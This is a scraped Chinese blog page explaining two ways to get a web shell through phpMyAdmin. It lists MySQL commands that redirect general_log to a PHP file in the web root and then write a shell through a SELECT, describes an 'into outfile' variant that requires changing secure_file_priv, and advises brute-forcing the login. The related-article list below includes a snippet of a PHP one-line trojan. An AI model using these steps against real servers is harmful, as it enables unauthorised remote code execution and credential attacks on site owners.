mysql 返回的查询结果为空 (即零行).,phpmyadmin getshell大法

最新推荐文章于 2021-03-31 15:28:13 发布
最新推荐文章于 2021-03-31 15:28:13 发布
阅读量453 收藏
点赞数
文章标签: mysql 返回的查询结果为空 (即零行).

0x00 概述

整理phpmyadmin的两种getshell方法,后续有其他方法再更新。

0x01 select日志

show variables like ‘general%’;

015a8cdab026efd7c8afac4f217abb80.png

set global general_log = ‘ON’;# MySQL 返回的查询结果为空 (即零行)。

set global general_log_file = ‘C:/phpStudy/PHPTutorial/WWW/logshell.php’;# MySQL 返回的查询结果为空 (即零行)。

d88b6246e9ca407db770c2c7fab24943.png

SELECT ‘’

9d239df0dc8283492acbfc1d24ee54e9.png

0x02 into outfile

此法有局限性,必须secure_file_priv不为null && 为网站路径

show variables like “secure_file_priv”;

默认Null

尝试设置为网站目录:

c9a983f3c1ac911fb934008304dc7ad2.png

需要修改my.ini

secure_file_priv=’网站路径

025564143977f96daaedb8e32dc7caac.png

dada50fc660c2e470e2808565dfc2507.png

67bc4c5316f39baaa64a1406c2432a07.png

0x03 其他

0x04 结语

phpmyadmin上述getshell方法都要登录,可尝试爆破。

0x05 参考资料

注意:本文来自LSABLOG。本站无法对本文内容的真实性、完整性、及时性、原创性提供任何保证,请您自行验证核实并承担相关的风险与后果!

CoLaBug.com遵循[CC BY-SA 4.0]分享并保持客观立场,本站不承担此类作品侵权行为的直接责任及连带责任。您有版权、意见、投诉等问题,请通过[eMail]联系我们处理,如需商业授权请联系原作者/原网站。

东方银
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 返回查询结果为 (即零)._Mysql数据同步(单向)
weixin_39996035的博客
02-04 1524
首先准备两台服务器:主:192.168.1.88从:192.168.1.78创建需要同步的数据库,比如为sync_db,将这个数据库各拷贝到78和88一份修改主服务器88上的配置,找到my.cnf文件,若不知道位置,可以使用#find / -name “my.cnf”找到#vi /etc/my.cnf添加:#88 master serverserver-id=100088log-binbinlog...
mysql 返回查询结果为 (即零)._当 MySQL 返回查询结果为(即零)的时候 结果表示0...
weixin_42389478的博客
02-27 883
满意答案lxvtag2013.09.09采纳率:48%等级:12已帮助:5206人SELECTa.update_date,a.user_id,a.news_id,(CASE WHEN b.counter IS NULL THEN 0 ELSE b.counter END) as 'Counter'FROM (SELECT update_date, user_id, news_idFROM ...
mysql select 补_mysql - 带有返回MySQL SELECT JOIN - SO中文参考 - www.soinside.com...
weixin_35920143的博客
02-26 159
我有以下MySQL表:[用户]| id | name ||----|---------|| 1 | John || 2 | Anna || 3 | Peter |[times]| user_ID | date | time ||---------|------------|--------|| 1 | 2020-03-20 | 07:00 ...
mysql判断不等于的脚本_Shell脚本中判断输入变量或者参数是否为的方法
weixin_30193269的博客
01-30 316
1.判断变量复制代码代码如下:read -p "input a word :" wordif [ ! -n "$word" ] ;thenecho "you have not input a word!"elseecho "the word you input is $word"fi2.判断输入参数复制代码代码如下:#!/bin/bashif [ ! -n "$1" ] ;thenecho "y...
mysql 查询,提供给报表输出
andywan的专栏
08-31 4395
案例为20一页。 创建存储过程进处理: BEGIN # 已查询记录数、每页记录数、需增加记录数 DECLARE jls,myjls,zjjls int; # DROP TEMPORARY TABLE if EXISTS t1; #将查询后的数据放入临时表 CREATE TEMPORARY  TABLE t1 SELECT zd1,zd2
如何用phpMyadmin查询某表中的某字段为的数据.pdf
05-19
精品资源 欢迎下载
MySQL 数据库管理工具 phpMyAdmin 5.1.1 Final 多语中文版.zip
06-14
phpMyAdmin 中文版是一个以 PHP 为基础,以Web-Base方式架构在网站主机上的 MySQL 的数据库管理工具,让管理者可用 Web 接口管 理 MySQL 数据库。借由此 Web 接口可以成为一个简易方式输入繁杂 SQL 语法的较佳途径,...
PHP实现把MySQL数据库导出为.sql文件实例(仿PHPMyadmin导出功能)
10-25
主要介绍了PHP实现把MySQL数据库导出为.sql文件实例(仿PHPMyadmin导出功能),需要的朋友可以参考下
phpMyAdmin出现显示白解决办法.docx
09-27
2. 设置 PHPMYADMIN 目录及上层目录的权限:需要将 PHPMYADMIN 目录及上层目录的权限设置为 Users - 读取和运,IUSR_ - 读取和运。 三、PHPMYADMIN 安装环境 在安装 PHPMYADMIN 之前,需要确保环境已经配置好...
Mysql查询无结果返回null值
weixin_44002764的博客
03-31 7330
SELECT isnull(FKhmc) as FKhmc FROM x008 ORDER BY fid DESC LIMIT 2,1 执上述查询返回一个没有内容的表 select ( SELECT isnull(FKhmc) as FKhmc FROM x008 ORDER BY fid DESC LIMIT 2,1 ) as 查询结果 查询上述结果表,,查询结果会显示为(null) ...
mysql使用函数后无查询数据返回一条null数据使它返回0条
qq_39389954的博客
07-28 2619
在使用mysql过程中发现使用函数后比如avg(),如下图 显示有一条记录 如果想要它返回集的话既0条数据可以在sql最后面加GROUP BY NULL 效果 可以发现返回的是0条数据
mysql返回保留格_MySQL的char和varchar针对格的处理
weixin_34723479的博客
01-18 455
MySQL的char和varchar存储和查询中包含格的实验MySQL版本一、测试char包含格的存储和查询测试发现,存储的数据,char数据类型的右侧格存储的时候被删除了,但是左侧格还保留。测试发现,查询的时候,char数据类型只是会判断查询条件中左侧的格,右侧的格也会忽略,因此查询1和查询3的结果是一致的。二、测试varchar包含格的存储和查询测试发现,存储的数据,varcha...
mysql打开general_log
Gary,Done的专栏
11-17 6113
博客原文 安利一篇我翻译的国外大牛的神经网络入门文章 最近在接收同时开发完的代码进调试时候,一个事务执过程没有报错,但是结果就是无法往数据库插入数据,最后打开general_log才发现是因为在代码执过程,每次调用sdk接口进sql执时候都是重新连数据库,所以最后的commit相当于没有任何提交 方法如下: #>: mysql -uroot -p{passwd} -P330
mysql查询结果为的栏目转为0
蜂鸟工作室的专栏
05-14 7450
问题提出:当查询数据库的时候,
shell查询中文数据ora-01756_shell简单处理mysql查询结果的方法
weixin_39603357的博客
12-19 266
首先理清要了解shell脚本的数组与字符串的一些特性:str=("hello" "world" "!") #结果: str: 3 #普通的字符串数组echo "str: " ${#str[@]}str1=("hello world !") #结果: str1: 1 #普通的字符串数组echo "str1: "${#str1[@]}str2=(`echo "Hello world !"`) #结果:...
通过mysql写入一句话木马
aocong5568的博客
10-11 1951
USE mysql;# MySQL 返回查询结果为(即零)。 # MySQL 返回查询结果为(即零)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回查询结果为(即零)。 # MySQL 返回查询结果为(即零)。 INSERT INTO a( cmd1 ) VALUES ( '<?php e...
mysql 查找字符串位置 instr()与LOCATE()字符串查找函数
热门推荐
黑科技的博客
03-06 5万+
INSTR(str,substr) 返回字符串 str 中子字符串的第一个出现位置。这和LOCATE()的双参数形式相同,除非参数的顺序被颠倒。   代码如下 复制代码 mysql> SELECT INSTR('foobarbar', 'bar');         -> 4 mysql> SELECT INSTR('xbar', 'foobar');   
mysql如何可视化展示查询结果
最新发布
05-05
有很多工具可以帮助可视化展示 MySQL 查询结果,以下是一些常用的工具: 1. MySQL Workbench:这是 MySQL 官方提供的一款免费的可视化工具,可以进数据库设计、管理和查询等操作。在查询结果窗口可以直接展示查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值